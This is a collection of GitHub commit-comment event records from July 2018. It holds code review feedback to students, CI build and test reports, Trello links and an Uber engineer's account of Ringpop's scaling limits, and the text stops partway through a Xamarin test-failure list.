{"id":"7939955885","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29647371,"position":null,"line":null,"path":null,"commit_id":"8f1a3fec5e49a3055d8a2f0fa59767072000d8f0","created_at":"2018-07-09T20:36:29Z","updated_at":"2018-07-09T20:36:29Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-314](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-314).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-314-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T20:36:29Z"}
{"id":"7939958878","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647378,"position":17,"line":17,"path":"Week-08/day-03/login-form/login-form.html","commit_id":"d141ea2d14750c8be42e75cf08f6a916a02a4266","created_at":"2018-07-09T20:37:06Z","updated_at":"2018-07-09T20:37:06Z","author_association":"NONE","body":"I like your class names and styles (\"login-form\" ✅), this `unsername` is a bit tricky."}},"created_at":"2018-07-09T20:37:06Z"}
{"id":"7939959397","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29647381,"position":null,"line":null,"path":null,"commit_id":"a251b16838bd4d2e4e00bfe3fd41aad2afe38c60","created_at":"2018-07-09T20:37:13Z","updated_at":"2018-07-09T20:37:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Графика, системы: сделать случайные (из выборки цветов и размеров) размеры и цвета для систем.](https://trello.com/c/EyRsw3pN/37-%D0%B3%D1%80%D0%B0%D1%84%D0%B8%D0%BA%D0%B0-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D1%8B-%D1%81%D0%B4%D0%B5%D0%BB%D0%B0%D1%82%D1%8C-%D1%81%D0%BB%D1%83%D1%87%D0%B0%D0%B9%D0%BD%D1%8B%D0%B5-%D0%B8%D0%B7-%D0%B2%D1%8B%D0%B1%D0%BE%D1%80%D0%BA%D0%B8-%D1%86%D0%B2%D0%B5%D1%82%D0%BE%D0%B2-%D0%B8-%D1%80%D0%B0%D0%B7%D0%BC%D0%B5%D1%80%D0%BE%D0%B2-%D1%80%D0%B0%D0%B7%D0%BC%D0%B5%D1%80%D1%8B-%D0%B8-%D1%86%D0%B2%D0%B5%D1%82%D0%B0-%D0%B4%D0%BB%D1%8F-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC)"}},"created_at":"2018-07-09T20:37:13Z"}
{"id":"7939959547","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647383,"position":15,"line":15,"path":"Week-08/day-03/login-form/login-form.js","commit_id":"d141ea2d14750c8be42e75cf08f6a916a02a4266","created_at":"2018-07-09T20:37:14Z","updated_at":"2018-07-09T20:37:14Z","author_association":"NONE","body":"👌 "}},"created_at":"2018-07-09T20:37:14Z"}
{"id":"7939959777","type":"CommitCommentEvent","actor":{"login":"christinagraham"},"repo":{"name":"christinagraham/missionbit.github.io"},"payload":{"comment":{"id":29647384,"position":null,"line":null,"path":null,"commit_id":"fa54dd16e81ab37954d98541a5842df8c39c257e","created_at":"2018-07-09T20:37:17Z","updated_at":"2018-07-09T20:37:17Z","author_association":"OWNER","body":"I think we should delete the text right below the picture and above the main title. The text seems to interrupt the flow of the site and isn't necessary."}},"created_at":"2018-07-09T20:37:17Z"}
{"id":"7939960486","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647386,"position":2,"line":2,"path":"Week-08/day-03/login-form/style.css","commit_id":"d141ea2d14750c8be42e75cf08f6a916a02a4266","created_at":"2018-07-09T20:37:26Z","updated_at":"2018-07-09T20:37:26Z","author_association":"NONE","body":":/"}},"created_at":"2018-07-09T20:37:26Z"}
{"id":"7939961221","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29647391,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T20:37:36Z","updated_at":"2018-07-09T20:37:36Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-09T20:37:36Z"}
{"id":"7939961674","type":"CommitCommentEvent","actor":{"login":"ahmedSamra88"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":29647392,"position":null,"line":null,"path":null,"commit_id":"feca5f24606aa1711362ff1d65ab85ffc94688ae","created_at":"2018-07-09T20:37:41Z","updated_at":"2018-07-09T20:37:41Z","author_association":"NONE","body":" cursor.close(); \r\nusing it remove data from cursor and no data apear in list "}},"created_at":"2018-07-09T20:37:41Z"}
{"id":"7939966778","type":"CommitCommentEvent","actor":{"login":"kriskowal"},"repo":{"name":"uber/ringpop-go"},"payload":{"comment":{"id":29647406,"position":null,"line":null,"path":null,"commit_id":"811fa96edc72069a7114d91bfc3e50ce822d4a5c","created_at":"2018-07-09T20:38:45Z","updated_at":"2018-07-09T20:38:45Z","author_association":"MEMBER","body":"@blampe and I put our heads together for this response. Thank you for asking.\r\n\r\nMany critical Uber services still use Ringpop. However, due to negative experiences in production, the next generation architecture will use other technologies and our staff are focusing on new solutions.\r\n\r\n* Convergence time across large clusters (>1k nodes) is slow.\r\n* Ringpop services mix forwarding and handling requests, which complicates isolating performance problems that could originate with either handling or forwarding.\r\n* Consistent hashing admits that there will be hot spots by design. To use Ringpop is a gamble that the hot spots are okay for your service’s problem and operational scale. For many services at Uber, this gamble has played out poorly, since Ringpop services must be scaled so that the workload fits under the ceiling of the hottest shard. For large clusters, this can be very expensive.\r\n* Ringpop clusters become unstable and experience cascading failure when their request latency approaches the Ringpop gossip ping timeout. The entire cluster becomes suspicious of the membership and spends more of its time managing peer lists, at the expense of real work. So a service with high latency tends to have yet higher latency.\r\n\r\nInstead, teams at Uber have been moving towards a more \"old school\" approach: clients query some a database (e.g. Zookeeper) for cluster membership, compute shard ownership from that source of truth, then do client-side or gateway load balancing across shards.\r\n\r\nThat said, if Ringpop works well for your use case by all means use it! We recommend that you do some synthetic benchmarking and load tests to see if you're happy with the scaling characteristics.\r\n\r\nRingpop remains a good solution for medium-sized clusters with state persisted in memory, where an all-in-one routing, health checking, and handling service is operationally less expensive than multiple coordinated services."}},"created_at":"2018-07-09T20:38:45Z"}
{"id":"7939968287","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29647412,"position":null,"line":null,"path":null,"commit_id":"8a7f7d6f776766877ad6790104bde49a6bc29894","created_at":"2018-07-09T20:39:03Z","updated_at":"2018-07-09T20:39:03Z","author_association":"NONE","body":"158913899-Add-single-sided-natural-ventilation-example-file (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8a7f7d6f776766877ad6790104bde49a6bc29894-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-09T20:39:03Z"}
{"id":"7939972474","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29647428,"position":49,"line":332,"path":"src/runtime/hexagon_dma.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T20:39:57Z","updated_at":"2018-07-09T20:39:57Z","author_association":"NONE","body":"is this still a pool per virtual engine, or per pipeline or per app (preferred)?\r\n\r\nif per app, should check the first call to Create(), else should call Get()?"}},"created_at":"2018-07-09T20:39:57Z"}
{"id":"7939975059","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647435,"position":8,"line":8,"path":"Week-08/day-02/keyup-event/keyup-event.js","commit_id":"cc1b62d3983564f73c424e02272455061c79337f","created_at":"2018-07-09T20:40:28Z","updated_at":"2018-07-09T20:40:28Z","author_association":"NONE","body":"Yes, but why is it in a new line?"}},"created_at":"2018-07-09T20:40:28Z"}
{"id":"7939975979","type":"CommitCommentEvent","actor":{"login":"janelbrandon"},"repo":{"name":"janelbrandon/bookmark-client"},"payload":{"comment":{"id":29647441,"position":null,"line":null,"path":null,"commit_id":"3652119f133f31b37cb4b208faae29186330d888","created_at":"2018-07-09T20:40:40Z","updated_at":"2018-07-09T20:40:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Student: View a list of topics and sub-topics](https://trello.com/c/OSwXPTeX/4-student-view-a-list-of-topics-and-sub-topics)"}},"created_at":"2018-07-09T20:40:40Z"}
{"id":"7939976307","type":"CommitCommentEvent","actor":{"login":"acastillo2015"},"repo":{"name":"acastillo2015/meetup"},"payload":{"comment":{"id":29647442,"position":null,"line":null,"path":null,"commit_id":"dbc8139dd92f3e51d86f86a6689a66d291122f56","created_at":"2018-07-09T20:40:45Z","updated_at":"2018-07-09T20:40:45Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/cb013323-07a0-4d03-9bee-8c21a7943b69?env_id=ibm%3Ayp%3Aus-south \"empty-toolchain-TERET\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/56b6533d-e438-455a-b4a1-8306ec340c07?env_id=ibm%3Ayp%3Aus-south \"Pipeline\") deployed [meetup](https://github.com/acastillo2015/meetup/releases/tag/deploy-ibm-yp-us-south-acastillo-cl.ibm.com-Meetup-Chile-20180709-204044 \"deploy-ibm-yp-us-south-acastillo-cl.ibm.com-Meetup-Chile-20180709-204044\") to [Meetup Chile](https://console.bluemix.net/apps/cab633ee-0332-40f1-b743-5ee55ecd70b8?env_id=ibm:yp:us-south \"ibm:yp:us-south:acastillo@cl.ibm.com:Meetup Chile\"), including this commit"}},"created_at":"2018-07-09T20:40:45Z"}
{"id":"7939976665","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29647445,"position":null,"line":null,"path":null,"commit_id":"657b9bf38384d56c896f74beeab7ade2472e1960","created_at":"2018-07-09T20:40:49Z","updated_at":"2018-07-09T20:40:49Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-657b9bf38384d56c896f74beeab7ade2472e1960-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-09T20:40:49Z"}
{"id":"7939978109","type":"CommitCommentEvent","actor":{"login":"dborstelmann"},"repo":{"name":"SlalomSTLHealthcare/healthcare-api"},"payload":{"comment":{"id":29647449,"position":null,"line":null,"path":null,"commit_id":"8a55f063d34cef6f607ff25d84e21fda84475487","created_at":"2018-07-09T20:41:07Z","updated_at":"2018-07-09T20:41:07Z","author_association":"CONTRIBUTOR","body":"@tlj4k8 Don't forget the migration!"}},"created_at":"2018-07-09T20:41:07Z"}
{"id":"7939979979","type":"CommitCommentEvent","actor":{"login":"CoffeeOne"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29647454,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T20:41:30Z","updated_at":"2018-07-09T20:41:30Z","author_association":"NONE","body":"@vondele \r\nIs this really a simplification? Just because of the removal of 2 arrays? For me that looks like a normal functional change."}},"created_at":"2018-07-09T20:41:30Z"}
{"id":"7939981951","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29647462,"position":73,"line":350,"path":"src/runtime/hexagon_dma.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T20:41:53Z","updated_at":"2018-07-09T20:41:53Z","author_association":"NONE","body":"same here on per virtual engine, or pipeline, or app. and should check and call Put(), and only call Free() on last virtual engine"}},"created_at":"2018-07-09T20:41:53Z"}
{"id":"7939982915","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647463,"position":8,"line":8,"path":"Week-08/day-02/bubbling/bubbling.js","commit_id":"9f226e2738fff775f831122e6dc721ff8089fead","created_at":"2018-07-09T20:42:05Z","updated_at":"2018-07-09T20:42:05Z","author_association":"NONE","body":"Unnecessary empty line."}},"created_at":"2018-07-09T20:42:05Z"}
{"id":"7939985765","type":"CommitCommentEvent","actor":{"login":"inghamn"},"repo":{"name":"City-of-Bloomington/drupal-customizations"},"payload":{"comment":{"id":29647474,"position":null,"line":null,"path":null,"commit_id":"f7019550cb0675b508a416cb4e3385d65dfd5a81","created_at":"2018-07-09T20:42:41Z","updated_at":"2018-07-09T20:42:41Z","author_association":"MEMBER","body":"Updates #27 "}},"created_at":"2018-07-09T20:42:41Z"}
{"id":"7939986750","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647477,"position":13,"line":14,"path":"Week-08/day-02/bubbling/bubbling.js","commit_id":"ee7bae632824f1dfa9800959336c910fad4ab1e0","created_at":"2018-07-09T20:42:54Z","updated_at":"2018-07-09T20:42:54Z","author_association":"NONE","body":"👍 for template literals."}},"created_at":"2018-07-09T20:42:54Z"}
{"id":"7939988007","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647478,"position":17,"line":17,"path":"Week-08/day-02/bubbling/bubbling.js","commit_id":"ee7bae632824f1dfa9800959336c910fad4ab1e0","created_at":"2018-07-09T20:43:10Z","updated_at":"2018-07-09T20:43:10Z","author_association":"NONE","body":"Pay attention to indentations."}},"created_at":"2018-07-09T20:43:10Z"}
{"id":"7939990635","type":"CommitCommentEvent","actor":{"login":"chan-ka"},"repo":{"name":"vgundlur/Halide"},"payload":{"comment":{"id":29647482,"position":84,"line":359,"path":"src/runtime/hexagon_dma.cpp","commit_id":"99b292374683f1f6d22a26663a131e69c94647b6","created_at":"2018-07-09T20:43:43Z","updated_at":"2018-07-09T20:43:43Z","author_association":"NONE","body":"should be safer to free L2$ pool first then DMA, since its DMA that is using L2$"}},"created_at":"2018-07-09T20:43:43Z"}
{"id":"7939993896","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"fbottarel/grasp-pose-gen"},"payload":{"comment":{"id":29647489,"position":null,"line":null,"path":null,"commit_id":"3b5eb1e6a0c4b79205d7263637743b51af459853","created_at":"2018-07-09T20:44:22Z","updated_at":"2018-07-09T20:44:22Z","author_association":"COLLABORATOR","body":"@towardthesea for your reference."}},"created_at":"2018-07-09T20:44:22Z"}
{"id":"7939996831","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647493,"position":34,"line":34,"path":"Week-08/day-02/bubbling/bubbling.js","commit_id":"9f226e2738fff775f831122e6dc721ff8089fead","created_at":"2018-07-09T20:44:58Z","updated_at":"2018-07-09T20:44:58Z","author_association":"NONE","body":"after the last `case`, add a __default__ case. You can leave it empty like: `default:`.\r\nIt means: do nothing as fallback."}},"created_at":"2018-07-09T20:44:58Z"}
{"id":"7940000241","type":"CommitCommentEvent","actor":{"login":"dcnb"},"repo":{"name":"ctrlshifty/ctrlshifty.github.io"},"payload":{"comment":{"id":29647501,"position":null,"line":null,"path":null,"commit_id":"ce81344d17b60e7d6fadaa316a2a3e116269b9ea","created_at":"2018-07-09T20:45:40Z","updated_at":"2018-07-09T20:45:40Z","author_association":"CONTRIBUTOR","body":"Wait I just did this it was easy. Sorry I asked. \r\n\r\nI like them!"}},"created_at":"2018-07-09T20:45:40Z"}
{"id":"7940000298","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/hearthis"},"payload":{"comment":{"id":29647502,"position":null,"line":null,"path":null,"commit_id":"d1ec6c40978a88a3b5a016041ab73962caa3592d","created_at":"2018-07-09T20:45:41Z","updated_at":"2018-07-09T20:45:41Z","author_association":"NONE","body":"TeamCity HearThis :: HearThis pull requests [Build *.*.42.d1ec6c40978a88a3b5a016041ab73962caa3592d](http://build.palaso.org/viewLog.html?buildId=124487&buildTypeId=HearThis_HearThisPullRequests) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:02:16"}},"created_at":"2018-07-09T20:45:41Z"}
{"id":"7940001034","type":"CommitCommentEvent","actor":{"login":"Grayson112233"},"repo":{"name":"Grayson112233/resume"},"payload":{"comment":{"id":29647504,"position":53,"line":53,"path":"resume.tex","commit_id":"116191866450f3441806199a6a2405319b6cf640","created_at":"2018-07-09T20:45:50Z","updated_at":"2018-07-09T20:45:50Z","author_association":"OWNER","body":"True. It really should be `The University of Texas at Austin`"}},"created_at":"2018-07-09T20:45:50Z"}
{"id":"7940006001","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29647509,"position":null,"line":null,"path":null,"commit_id":"b12567aeaf2a610c38e5f1e44a2689c5155be6f0","created_at":"2018-07-09T20:46:52Z","updated_at":"2018-07-09T20:46:52Z","author_association":"MEMBER","body":"Because they're being used separetly by the litemod.json I wanted to build the full version string dynamically rather than write it twice."}},"created_at":"2018-07-09T20:46:52Z"}
{"id":"7940006795","type":"CommitCommentEvent","actor":{"login":"megarame"},"repo":{"name":"atr2600/myWebApp"},"payload":{"comment":{"id":29647512,"position":9,"line":59,"path":"views/experience.ejs","commit_id":"77a84e5e1e87c26ead218552d60f6052e32acc9c","created_at":"2018-07-09T20:47:01Z","updated_at":"2018-07-09T20:47:01Z","author_association":"NONE","body":"Interlude toolbar"}},"created_at":"2018-07-09T20:47:01Z"}
{"id":"7940009892","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647521,"position":9,"line":9,"path":"Week-08/day-04/myreddit/server.js","commit_id":"ff841549ea202a86a9d437a7ff8c922298a2df49","created_at":"2018-07-09T20:47:40Z","updated_at":"2018-07-09T20:47:40Z","author_association":"NONE","body":"I'm very proud of you for using .env, __BUT__:\r\ndo not commit the `.env` file. The main idea is to keep in secret the credentials."}},"created_at":"2018-07-09T20:47:40Z"}
{"id":"7940010724","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647522,"position":18,"line":18,"path":"Week-08/day-04/myreddit/server.js","commit_id":"ff841549ea202a86a9d437a7ff8c922298a2df49","created_at":"2018-07-09T20:47:51Z","updated_at":"2018-07-09T20:47:51Z","author_association":"NONE","body":";"}},"created_at":"2018-07-09T20:47:51Z"}
{"id":"7940011633","type":"CommitCommentEvent","actor":{"login":"Yivan"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29647524,"position":null,"line":null,"path":null,"commit_id":"2c24923c5a011f767e3894c3a6c0cf5238332d73","created_at":"2018-07-09T20:48:02Z","updated_at":"2018-07-09T20:48:02Z","author_association":"CONTRIBUTOR","body":"Here:\r\nhttps://pimcore.com/docs/master/Development_Documentation/Development_Tools_and_Details/Cache/index.html\r\nAnd here:\r\nhttps://pimcore.com/docs/master/Development_Documentation/Installation_and_Upgrade/System_Requirements.html"}},"created_at":"2018-07-09T20:48:02Z"}
{"id":"7940014274","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Counter"},"payload":{"comment":{"id":29647527,"position":null,"line":null,"path":null,"commit_id":"910e5b6b5873294c7869fe6d338669382491d911","created_at":"2018-07-09T20:48:31Z","updated_at":"2018-07-09T20:48:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Complete the stretch of the Redux-Counter by following instructions](https://trello.com/c/Pbu4exXA/6-complete-the-stretch-of-the-redux-counter-by-following-instructions)"}},"created_at":"2018-07-09T20:48:31Z"}
{"id":"7940015727","type":"CommitCommentEvent","actor":{"login":"balazskaxd"},"repo":{"name":"green-fox-academy/Norlandia"},"payload":{"comment":{"id":29647531,"position":28,"line":28,"path":"Week-08/day-04/myreddit/server.js","commit_id":"ff841549ea202a86a9d437a7ff8c922298a2df49","created_at":"2018-07-09T20:48:50Z","updated_at":"2018-07-09T20:48:50Z","author_association":"NONE","body":"Break every key (`'Content-Type'`) into a new line, or use spaces inside the object:\r\n`res.header({ 'Content-Type': 'application/json' });`"}},"created_at":"2018-07-09T20:48:50Z"}
{"id":"7940016430","type":"CommitCommentEvent","actor":{"login":"Yivan"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29647533,"position":null,"line":null,"path":null,"commit_id":"2c24923c5a011f767e3894c3a6c0cf5238332d73","created_at":"2018-07-09T20:48:58Z","updated_at":"2018-07-09T20:48:58Z","author_association":"CONTRIBUTOR","body":"![capt](https://user-images.githubusercontent.com/9025839/42475207-40dbe3c2-83ca-11e8-82a4-414c1a8d9dc4.png)\r\n"}},"created_at":"2018-07-09T20:48:58Z"}
{"id":"7940016604","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29647534,"position":null,"line":null,"path":null,"commit_id":"c1ad3f78654c9f34fb043e0cc96cd632dd4d889e","created_at":"2018-07-09T20:49:00Z","updated_at":"2018-07-09T20:49:00Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/79/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/79//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c1ad3f78654c9f34fb043e0cc96cd632dd4d889e/79/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c1ad3f78654c9f34fb043e0cc96cd632dd4d889e/79/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c1ad3f78654c9f34fb043e0cc96cd632dd4d889e/79/jenkins-results/generator-diff/index.html) (please review changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/c1ad3f78654c9f34fb043e0cc96cd632dd4d889e/79/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n150 tests failed, 11 tests passed.\n\n## Failed tests\n\n * monotouch-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Tds/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IO.Compression.FileSystem/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.CSharp/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Security/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.IdentityModel/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * introspection/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * dont link/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link all/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Debug: Skipped (No applicable devices found.)\n * link sdk/iOS Unified 32-bits - simulator/Release: Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (static registrar): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Release (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 32-bits - simulator/Debug (all optimizations): Skipped (No applicable devices found.)\n * monotouch-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * framework-test/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mini/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * interdependent-binding-projects/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * fsharp/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * mscorlib/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Core/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Data/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Net.Http/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Numerics/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Runtime.Serialization/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Transactions/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Web.Services/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Xml.Linq/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Security/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ComponentModel.DataAnnotations/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.Json/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * System.ServiceModel.Web/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices found.)\n * Mono.Data.Sqlite/iOS Unified 64-bits - simulator/Debug: Skipped (No applicable devices 